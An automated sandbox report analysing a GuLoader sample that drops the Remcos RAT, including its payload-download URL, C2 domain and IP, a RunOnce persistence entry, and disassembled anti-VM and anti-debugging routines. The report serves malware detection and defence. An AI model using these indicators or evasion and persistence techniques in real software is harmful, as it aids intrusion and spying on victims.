Play interactive tour

Edit tour

Windows Analysis Report pRcHGlVekw.exe

Overview

General Information

Sample Name:	pRcHGlVekw.exe
Analysis ID:	458794
MD5:	d2cb32f7c7f384b4baa8dd13d6b5bbab
SHA1:	355acb5af5caaeb59fd7c9e0a54b501c24d47919
SHA256:	2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
Tags:	32exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious values (likely registry only malware)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

pRcHGlVekw.exe (PID: 3164 cmdline: 'C:\Users\user\Desktop\pRcHGlVekw.exe' MD5: D2CB32F7C7F384B4BAA8DD13D6B5BBAB)

pRcHGlVekw.exe (PID: 1724 cmdline: 'C:\Users\user\Desktop\pRcHGlVekw.exe' MD5: D2CB32F7C7F384B4BAA8DD13D6B5BBAB)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

ReversingLabs: Detection: 17%

Multi AV Scanner detection for submitted file

Show sources

Source: pRcHGlVekw.exe

ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: pRcHGlVekw.exe

Joe Sandbox ML: detected

Source: pRcHGlVekw.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: wealthyrem.ddns.net

Source: global traffic

TCP traffic: 192.168.2.3:49737 -> 194.5.97.128:39200

Source: Joe Sandbox View	IP Address: 194.5.97.128 194.5.97.128
Source: Joe Sandbox View	IP Address: 101.99.94.119 101.99.94.119

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\pRcHGlVekw.exe

E-Banking Fraud:

Yara detected Remcos RAT

Show sources

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218929D NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218435F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021859E6 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185A22 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218486E NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021846AC NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184CFA NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218914B NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185564 NtWriteVirtualMemory,TerminateProcess,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181766 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183DA0 NtWriteVirtualMemory,

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218561A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218226F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180E63
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02189695
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021806BF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183A2B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182021
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188053
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180248
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218086F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185E60
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182A67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185E67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187C9A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021896A8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021886D9
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180CDF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021810F0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180CE4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183B1F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184111
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181113
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181136
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183123
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182B4B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182F76
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185D6E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188960
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181BBB
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183DA0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021879D6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021807F2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180DF4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021803F6

Source: pRcHGlVekw.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pRcHGlVekw.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: pRcHGlVekw.exe, 00000001.00000000.219062533.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000001.00000002.344452128.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000002.1306296984.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000000.341877354.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe

Source: pRcHGlVekw.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@175/3

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Local\Temp\~DF4931134DE445F613.TMP

Jump to behavior

Source: pRcHGlVekw.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: pRcHGlVekw.exe

ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File read: C:\Users\user\Desktop\pRcHGlVekw.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_00407108 push ebp; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A033 push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A037 push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A02B push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A02F push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A027 push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A037 push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A033 push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A027 push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A02F push ds; retf
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A02B push ds; retf

Source: initial sample	Static PE information: section name: .text entropy: 7.08042704515
Source: initial sample	Static PE information: section name: .text entropy: 7.08042704515

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs			Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\UNDERDEVELOPED.EXE\HOMOTYPYSET W = CREATEOBJECT("WSCRIPT.SHELL")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\UNDERDEVELOPED.EXE\HOMOTYPYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDRAWSPAN

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000002187EBB second address: 0000000002187EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000002187FF6 second address: 0000000002187FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000000567EBB second address: 0000000000567EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000000567FF6 second address: 0000000000567FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02187EB3 rdtsc

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Window / User API: foregroundWindowGot 547

Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624	Thread sleep count: 276 > 30
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624	Thread sleep time: -138000s >= -30000s

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Last function: Thread delayed

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\UNDERDEVELOPED.exe\HOMOTYPYSet W = CreateObject("WScript.Shell")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\UNDERDEVELOPED.exe\HOMOTYPYSoftware\Microsoft\Windows\CurrentVersion\RunOnceDRAWSPAN
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Thread information set: HideFromDebugger

